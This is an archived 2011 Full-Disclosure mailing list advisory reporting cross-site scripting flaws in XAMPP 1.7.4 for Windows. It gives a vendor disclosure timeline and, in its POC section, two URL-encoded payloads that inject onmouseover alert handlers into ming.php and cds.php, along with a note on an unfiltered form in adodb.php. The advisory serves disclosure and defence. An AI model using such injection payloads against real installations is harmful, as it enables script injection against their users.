[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] XAMPP 1.7.4 XSS vulnerabilities
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] XAMPP 1.7.4 XSS vulnerabilities
- From: sangte amtham <sangteamtham@xxxxxxxxx>
- Date: Fri, 28 Oct 2011 01:45:20 +0700
Please download the attachment
$-------------------------------------------------------------------------------------------------------------------
$ Xampp 1.7.4 for Windows multiple Site Scripting Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.apachefriends.org/en/xampp-windows.html
$ Date :07/12/2011
$ Twitter: http://twitter.com/Sangte_amtham
$******************************************************************************************
1.Description:
XAMPP is an easy to install Apache distribution containing MySQL, PHP and
Perl. XAMPP is really
very easy to install and to use - just download, extract and start.
2. Patch:
Jul 12, 2011: Contact to vendor.
Jul 12, 2011: Vendor said that they would fix in next release
Sep 21, 2011: Released XAMPP 1.7.7
Oct 27, 2011: Release the bug.
3. POC:
http://localhost/xampp/ming.php?text=%22%20onmouseover%3dalert%28%22XSS%22%29%20bad%22
http://localhost/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
In adodb.php, we have a form to submit database information, but this form is
not filer well. So web can submit the
malicious codes.
http://localhost/xampp/adodb.php
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more
security
$
$
$--------------------------------------------------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/